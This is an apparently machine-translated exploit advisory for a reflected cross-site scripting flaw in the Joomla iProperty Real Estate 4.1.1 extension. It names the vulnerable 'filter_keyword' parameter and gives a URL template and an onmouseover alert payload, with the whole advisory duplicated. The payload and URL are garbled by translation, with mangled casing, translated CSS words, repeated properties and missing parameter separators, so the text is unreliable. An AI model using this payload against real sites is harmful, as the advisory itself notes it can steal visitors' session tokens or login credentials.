#利用标题: JOOMLA IPROPERTY房地产4.1.1-反映XSS
#利用作者:饼干
#日期: 29/07/2023
#vendor: Thinkery LLC
#供应商HomePage: http://thethinkery.net
#软件link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/
#DEMO: https://iproperty.thethinkery.net/
#版本: 4.1.1
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH:/iProperty/property-views/All-Properties-with-Map
获取参数'filter_keyword'很容易受到XSS的影响
https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[xss] option=com_ipropertyview=allpropertiesipquicksearch=1
XSS PAYLOLAL: PIHIL'ONMOSEOVER='ALERT(1)'style='位置:absolute; width:100%; height :100%; top:0; top:0; left:0; left:0; left:0;'f63m4;'f63m4
[-] 完毕
#利用作者:饼干
#日期: 29/07/2023
#vendor: Thinkery LLC
#供应商HomePage: http://thethinkery.net
#软件link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/
#DEMO: https://iproperty.thethinkery.net/
#版本: 4.1.1
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH:/iProperty/property-views/All-Properties-with-Map
获取参数'filter_keyword'很容易受到XSS的影响
https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[xss] option=com_ipropertyview=allpropertiesipquicksearch=1
XSS PAYLOLAL: PIHIL'ONMOSEOVER='ALERT(1)'style='位置:absolute; width:100%; height :100%; top:0; top:0; left:0; left:0; left:0;'f63m4;'f63m4
[-] 完毕
